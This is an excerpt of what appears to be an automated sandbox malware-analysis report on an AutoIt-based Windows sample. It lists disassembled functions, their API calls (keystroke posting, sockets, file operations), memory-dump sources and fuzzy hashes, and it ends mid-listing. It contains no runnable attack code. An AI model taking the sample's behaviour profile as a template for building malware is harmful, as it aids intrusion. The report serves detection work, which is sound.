                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 89aea7c473231d013791eba3fc0bd0af619d88ad85b973ef775d3fa007047f4d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2e2ffd00e0f4e1e79c08e2496fcec69c4cbdc0e729c3524f9cdab794da69f5ad
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89aea7c473231d013791eba3fc0bd0af619d88ad85b973ef775d3fa007047f4d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76915974A183029FC704EF24C48492AB7E5FF99719F14892EF88A97351DB31ED59CB82
                                                                                                                                                                                                                                                                                                                            Function 0025560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?,?,00230C4E), ref: 0023091B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230936
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?,?), ref: 00230944
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002308FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00230831,80070057,?), ref: 00230954
                                                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002556AE
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002557B6
                                                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0025582C
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00255837
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 51d6b6c6d4e4949246ae06e353694937d3113cc5282ea17b06957d14c03f9785
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c380b956a6a30ab1e75969de001a1cffe0dc5be69e252f246d31e06be68be6bf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51d6b6c6d4e4949246ae06e353694937d3113cc5282ea17b06957d14c03f9785
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2913571D1062DEFDF10DFA4D890AEEB7B9BF08314F10416AE915A7241EB709A58CFA0
                                                                                                                                                                                                                                                                                                                            Function 00262B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 00262C1F
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00262C51
                                                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00262C79
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00262CAF
                                                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00262CE9
                                                                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00262CF7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002343AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetCurrentThreadId.KERNEL32 ref: 002343B4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00232F00), ref: 002343BB
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00262D7F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023F292: Sleep.KERNEL32 ref: 0023F30A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c55c55f5d04e3e4da25ac150b7b70b2c9398e4c7aff9e5289044c3a9d0ae6eec
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3523450ce7d931c914a193b71c81ecb45e962fde65c4dddfde7768e85b4dc131
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c55c55f5d04e3e4da25ac150b7b70b2c9398e4c7aff9e5289044c3a9d0ae6eec
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE718B75E10609EFCB10EF64C885AAEB7F5EF48310F118459E816AB351DB74EE918F90
                                                                                                                                                                                                                                                                                                                            Function 0023B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 0023B8C0
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023B8D5
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0023B936
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0023B964
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0023B983
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0023B9C4
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0023B9E7
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fcc1cb2cc1c80810ca37c4a2b074c62eceb7c8f14b927dcaa9e2144b2556c6a4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 56275398a09e76b6c3dbd4f195d37876336dd477dd2f94ad27c4b9993dcfb788
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcc1cb2cc1c80810ca37c4a2b074c62eceb7c8f14b927dcaa9e2144b2556c6a4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D751E2E0A287D63EFB374E348C45BB6BEA95B06704F088489E2D5458D2C3D8ACE4DB50
                                                                                                                                                                                                                                                                                                                            Function 0023B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 0023B6E0
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023B6F5
                                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0023B756
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0023B782
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0023B79F
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0023B7DE
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0023B7FF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a2f3b1c628b481bb9ccb855be3c0056982536c37b35e76885b8059d328ccd76c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4afed7c142f4f9ec9d9eab6c9cff931d37b0a22a2dc7cfae3fc7861859aa44da
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2f3b1c628b481bb9ccb855be3c0056982536c37b35e76885b8059d328ccd76c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D25115E1A243D63DFB338F24CC16B76BE999B45704F088489E2D54A8C2D394EDA4DB50
                                                                                                                                                                                                                                                                                                                            Function 002057A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00205F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002057E3
                                                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0020585E
                                                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00205879
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0020589F
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00205F16,00000000,?,?,?,?,?,?,?,?,?,00205F16,?), ref: 002058BE
                                                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00205F16,00000000,?,?,?,?,?,?,?,?,?,00205F16,?), ref: 002058F7
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8df542776bd8bd1720ea28f6e74d56552e0032a755d9cfc9193d8c2ca83099f5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 96aee0034d8b47231bb860512cf23eacf4173af49b4b8715e4ae568aa7ea92cb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8df542776bd8bd1720ea28f6e74d56552e0032a755d9cfc9193d8c2ca83099f5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9751BF70A10759DFCB10CFA8D885BEEBBB8EF09320F14415AE955E7292D7709961CFA0
                                                                                                                                                                                                                                                                                                                            Function 001F3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 001F30BB
                                                                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 001F30C3
                                                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 001F3151
                                                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 001F317C
                                                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 001F31D1
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ea9d3e339a7ee021585484c21daa60246c2f27e9f41372fbf7065ce5334ac6ee
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 86c9cabb984ce7b78cd57d4976d220c0362507ec1ea329606e18a8ebb8c20c39
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea9d3e339a7ee021585484c21daa60246c2f27e9f41372fbf7065ce5334ac6ee
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4741B434E0420C9BCF10DF68CC85ABEBBB5AF45324F148156EA29AB392D731DB15CB91
                                                                                                                                                                                                                                                                                                                            Function 00251B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00253AD7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253AAB: _wcslen.LIBCMT ref: 00253AF8
                                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00251B6F
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00251B7E
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00251C26
                                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00251C56
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dee76159ccebdd65f8622b902dfda45a30e42508fa3d405e1af42d15c7eebecf
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a389c81b97447945f44a4fe606aee02f8b6a3853442753226eb482c36abcbfdf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dee76159ccebdd65f8622b902dfda45a30e42508fa3d405e1af42d15c7eebecf
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E412631610109AFDB10DF24C888BAAB7E9EF4432AF14805AFC059F292D7B0ED55CBE5
                                                                                                                                                                                                                                                                                                                            Function 0023D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0023D7CD,?), ref: 0023E714
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0023D7CD,?), ref: 0023E72D
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0023D7F0
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0023D82A
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023D8B0
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023D8C6
                                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 0023D90C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 39870e37581f7b2c4537244dd6d8c8ef497b0f610e8cbe036f2c42529bbff3c3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ac651c2f996a9aa3c380ee8c42ba8dcf1be725f4916714615ac4d20008ead9bb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39870e37581f7b2c4537244dd6d8c8ef497b0f610e8cbe036f2c42529bbff3c3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8415FB19152199ADF12EFA4D985BDE73B9AF18340F1100EAE609EB141EB34B799CF10
                                                                                                                                                                                                                                                                                                                            Function 002442B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00244310
                                                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00244367
                                                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00244390
                                                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0024439A
                                                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002443AB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2256411358-1658319840
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1be99065f21a4494e5dd70fc1bf5997c2d20bee45056642d117bfa67999f9796
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 30b2d2972bdcdef85172caade81d34ebf4b43fef0c4ca7643817f676bef64bab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1be99065f21a4494e5dd70fc1bf5997c2d20bee45056642d117bfa67999f9796
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631AA70924347DFEB3DEF78E84CB777FA8AB02704F2445A9D452821A0D7A4A469CB11
                                                                                                                                                                                                                                                                                                                            Function 00263899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002638B8
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002638EB
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00263920
